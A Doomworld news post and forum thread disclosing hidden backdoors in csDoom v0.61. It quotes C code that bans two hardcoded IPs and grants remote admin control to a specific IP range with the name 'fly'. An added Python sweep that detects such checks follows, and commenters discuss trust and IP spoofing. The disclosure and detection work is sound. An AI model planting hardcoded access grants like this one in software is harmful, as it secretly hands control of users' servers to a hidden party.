Linguica

csDoom Problems

csDoom v0.61 has been released which fixes a bug relating to teamplay. However, there's some more important stuff to mention here. Apparently Fly has been putting certain "hidden features" into csDoom, two of which have been found. Here's the source code for one:

void SV_CheckIP (void)
{
        if ( net_from.ip[0]==62 && net_from.ip[1]==252 &&
                 net_from.ip[2]==3 && net_from.ip[3]==130)
        {
                SV_PlayerTriedToCheat();
        }
        if ( net_from.ip[0]==24 && net_from.ip[1]==114 &&
                 net_from.ip[2]==98 && net_from.ip[3]==138)
        {
                SV_PlayerTriedToCheat();
        }
}

This one basically bans two people from ever playing csDoom on any server which has this code compiled in. I'm not exactly sure why these 2 IPs were targeted. However, there's an even more serious one:

        /* source address 195.170.202.x and a player name of "fly" in one of three capitalisations */
        if ( net_from.ip[0]==195 && net_from.ip[1]==170 &&
                 net_from.ip[2]==202 &&
                 ( !strcmp(players[parse_cl].userinfo.netname, "fly")
                 || !strcmp(players[parse_cl].userinfo.netname, "FLY")
                 || !strcmp(players[parse_cl].userinfo.netname, "Fly") )
           )
        {
                clients[parse_cl].allow_rcon = true;
        }

This basically means that Fly, the creator of csDoom, can take over any server you may choose to set up, and perform "administrative" functions (kick people, change maps, etc). Now while banning 2 IPs may be marginally all right, leaving a back door so the creator can remotely control any server is not. Doomworld urges everyone to think strongly before using csDoom 0.61 -- there's no way to know what other "hidden features" it may contain. csDoom 0.5, while being less functional, has had its source released and thus can be swept for such unwanted additions.
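
The sweep of released source that the post mentions, as an added example (not part of the original post and not csDoom code): a Python pass over C source that reports every `if` whose condition compares address octets to literals, with the reconstructed address, any string literals compared in the same condition, and the first statement it guards. The sample input is constructed from the snippets quoted above, and the function names `if_conditions` and `sweep` are hypothetical.

```python
import re

# Constructed input: abridged from the two snippets quoted in the post above.
SAMPLE_C = '''void SV_CheckIP (void)
{
        if ( net_from.ip[0]==62 && net_from.ip[1]==252 &&
                 net_from.ip[2]==3 && net_from.ip[3]==130)
        {
                SV_PlayerTriedToCheat();
        }
}
        if ( net_from.ip[0]==195 && net_from.ip[1]==170 && net_from.ip[2]==202 &&
                 ( !strcmp(players[parse_cl].userinfo.netname, "fly")
                 || !strcmp(players[parse_cl].userinfo.netname, "Fly") ) )
        {
                clients[parse_cl].allow_rcon = true;
        }
'''

# ip[N] against an integer literal; '=' is accepted too, since copied snippets drop characters.
OCTET = re.compile(r'\bip\s*\[\s*([0-3])\s*\]\s*={1,2}\s*(\d{1,3})')
# strcmp/stricmp/strcasecmp whose second argument is a string literal.
NAME = re.compile(r'\bstr(?:i|case)?cmp\s*\([^,]+,\s*"([^"]*)"')

def if_conditions(src):
    """Yield (line, condition text, index just past the closing paren)."""
    for m in re.finditer(r'\bif\s*\(', src):
        depth, i = 1, m.end()
        while i < len(src) and depth:          # walk to the matching ')'
            depth += {"(": 1, ")": -1}.get(src[i], 0)
            i += 1
        yield src.count("\n", 0, m.start()) + 1, src[m.end():i - 1], i

def sweep(src):
    """Report each if-condition testing hardcoded address octets, and what it guards."""
    findings = []
    for line, cond, end in if_conditions(src):
        octets = {int(n): v for n, v in OCTET.findall(cond)}
        if not octets:
            continue
        addr = ".".join(octets.get(n, "x") for n in range(4))
        names = sorted(set(NAME.findall(cond)))
        action = src[end:src.find("}", end)].strip(" \t\n{")
        findings.append((line, addr, names, action))
    return findings

if __name__ == "__main__":
    for finding in sweep(SAMPLE_C):
        print(finding)
```

A textual pass like this only finds checks written in this shape; it narrows down where to read and does not clear a code base.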

Guest Anonymous User

we just need the client source for v0.6. Given that clients are more likely to be running on an OS without security/permissions (read: Win32) that's the more dangerous one as well.

Guest Anonymous User

now we see the real reason why fly was so loath to release the sources

Guest Anonymous User

Hehe, fly is one clever bastard.. Anyway, it's his work, he's the boss :o)

Guest Anonymous User

I don't think I'll be running CSDoom for a while :

Guest Anonymous User

does anybody of you remember that QW and Q2 had these backdoors in also? it was there maybe fly simply copied code from an old QW version :)


I have the csDoom source code for Win32. Give me the word at wsean@home.com if you want a backdoor-free version of this.

Guest Anonymous User

<NightFang> Ling: I asked Fly as to why he added that backdoor into csDoom and he simply said "Quake does it"
<NightFang> then I said "quake != Csdoom"
<NightFang> with his reply "quake == csdoom"

Guest Anonymous User

the fact he used 3 strcmps rather than just use 1 strcasecmp gives an indication of his lack of programming ability

Guest ethhoack

trust is very important in computing. if we can't trust fly to run a server, how could we trust him with a closed source client?

Guest Anonymous User

Why not just block traffic from the IP range he put in there? Any firewall can do that sort of thing. BTW anyone who tries a backdoor like this can fuck off - id included.


Anyone with the nick fly can use that backdoor. hehe

Guest Anonymous User

Nah, that's not entirely true, you also have to be coming from an IP address in the 195.170.202.x range.

Guest Anonymous User

It's stricmp, not strcasecmp. I'm really surprised that Fly didn't use this function; it's ANSI C. If the whole code is that poorly optimised, he is not a good programmer at all.

Guest Anonymous User

Think about this guy:
- He writes a program everybody uses
- He doesn't release the source code for that program although everybody wants him to
- The program is poorly optimized
- There are uncommented backdoors in it
- The guy seems to be an asshole
Damn it. Fly is Bill Gates!


I trust Fly more than anyone who posted here. As from what's been mentioned, the things fly could do to a server would only be done if he wanted to waste his time instead of just making csdoom or whatever other important stuff he does with his life. Why should anyone fear (maybe some retard that offended him, but why should a csdoom player care?)? Nothing new has happened and nothing worth a fuss. Csdoom is really cool and really fun. This news may be true, but so what? Yeah, it's good if someone checks another's prog, but come back when you have some useful stuff, not this "oh my, Fly's a Russian spy, he's gonna screw us!" Hahaha! Also, post with a name, if you wanna be heard. Be constructive... or have I seen your client/server DOOM version?

Guest Anonymous User

strcasecmp is the ansi version i believe.. anyway linux doesn't have stricmp so that's why i wrote that

Guest DN

Let's give him a chance to defend himself before everyone lynches him, eh?


Since I know nothing about programming and can't make head or tails out of that code I can't comment with any kind of expertise. However, I don't like the sound of this one bit. I hope someone who is knowledgeable will get hold of the source and remove this funny stuff. Anyway, how could anyone possibly cheat at Csdoom? Wouldn't there be some sort of consistency failure or something?

Guest Anonymous User

consistency failures are impossible due to the way csdoom works. If you can control the server, it may be perfectly possible to cheat.

Guest Anonymous User

Yeah, great, all those "we are smarter than fly" comments on his programming style! If you are so great at it, where is your client server DOOM? Or any sourceport of any kind? And before judging him, give him a chance to defend himself! id did it too and it seems that nobody is hating them for doing it!

Guest Anonymous User

Hey, check out the official CSDOOM page! What's up with that?


I've had enough about #doomroom. I am sick of the subject now. I've decided not to visit there anymore and that's that. Let those guys have their little place. Namecalling will not help the situation. Let it be.

Guest Anonymous User

All this jumping on the "fly is crap" bandwagon really does remind me of when the same guys got stuck into doomserv. It seems so easy to call someone when you cannot do 1 bit of the work he has done. The only problem I see is if Bill Clinton should one day decide to run csdoom server on White House computer :)


Undoubtedly triggered by the takeover of #csdoom, Fly has decided to discontinue work on the CSDoom source port. I now officially declare #doomroom a much, much, much worse place than #doom2 EVER was.

Guest Anonymous User

Well, you did it to doomserv, now you have done it to csdoom. Is it just because you cannot stand to see anyone enjoy playing doom on net? You make me sick


Unlike CSDoom's, Doomserv's exploit was purely accidental. The exploit was pointed out and a new version fixing it was to come out - I've no idea what happened since then.

Guest sponge

We ruined csDoom? We ruined it by exposing 2 holes in the code? There are IP spoofers. You could spoof Fly's IP, and wreak havoc on csDoom servers. And for exposing this hole, we ruined csDoom. Anonymous user, YOU make me sick.

This topic is now closed to further replies.